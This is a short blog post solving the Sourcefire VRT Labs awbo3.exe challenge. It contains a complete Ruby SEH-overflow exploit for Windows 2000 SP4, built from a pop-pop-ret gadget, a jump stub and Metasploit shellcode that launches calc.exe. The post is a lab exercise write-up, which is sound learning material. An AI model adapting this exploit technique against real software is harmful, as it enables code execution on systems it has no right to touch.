Solution: awbo3.exe - Windows 2000 SP4 R1
After a very hectic week I was able to sit down and work on awbo3.exe from the SourceFire VRT Labs. Since the rules state no static return stack addresses or noop sleds it took me a little bit longer to get this one working correctly. I had to get an assist on the backwards jump from mc but once I figured that trick out it was easy. I don't have a copy of Windows XP Sp2 installed, but I will post the solution for that XP as soon as I can get SP2 installed. I have the noop slide version commented out below it was a bit easier to make than the specific spacing version, and it probably more reliable also. If anyone is interested in the details of how this SEH overflow worked let me know and I will write up a detailed post and how everything worked.
#!/usr/bin/env ruby
#Jacob Hammack
#jacob.hammack@hammackj.com
#exploit for awbo3.exe from Sourcefire VRT labs, Windows 2000 SP4 Rollup 1
poppopret = [0x77fb3326].pack('V') #ntdll.dll pop esi pop ebx ret, w2ksp4r1
#121, metasploit exec calc.exe
shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
nseh = "\xEB\x06\x90\x90"
seh = poppopret
stage1 = [0xe8, -1024].pack('CV') #thx mc~
#Vuln tiggers at 1084 so, we need a buffer padding before the shellcode,
#in this case is 120 bytes then the shellcode and the rest of buffer in
#a's so 843 for the rest of 1084
payload = "A" * 120 + shellcode + "A" * 843 + nseh + seh + stage1
#payload ="\x90" * (1084 - shellcode.length) + shellcode + nseh + seh + stage1
print payload